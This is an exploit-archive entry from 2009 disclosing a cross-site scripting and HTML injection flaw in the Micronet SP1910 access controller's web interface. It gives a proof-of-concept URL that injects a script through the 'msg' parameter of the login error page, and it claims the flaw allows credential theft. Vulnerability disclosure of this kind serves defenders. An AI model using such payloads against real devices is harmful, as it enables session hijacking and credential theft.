Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection

2009-11-27T00:00:00
ID 1337DAY-ID-10035
Type zdt
Reporter K053
Modified 2009-11-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection
===================================================================

# Exploit: XSS & Html code injection in Micronet SP1910 data access controller UI
# Date: 27-11-2009
# Author: K053
# Vendor: http://www.micronet.info/model_detail.aspx?series_no=6&sno=472
# Tested on : Private Networks
 
------------------------------------------------------------------------------------
Note :
 
Micronet introduces an exciting new product—SP1910 Network Access Controller. It is
specially designed for secure wired and wireless network environments of small or
medium companies. Micronet UI is vulnerable to xss attack .
 
Attacker able to steal users credential and disconnect them .
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-
 
POC :
 
you can spot xss any page ,
 
http://server/loginpages/error_user.shtml?uname=userid&msg=<script>alert('xss')</script>



#  0day.today [2018-03-01]  #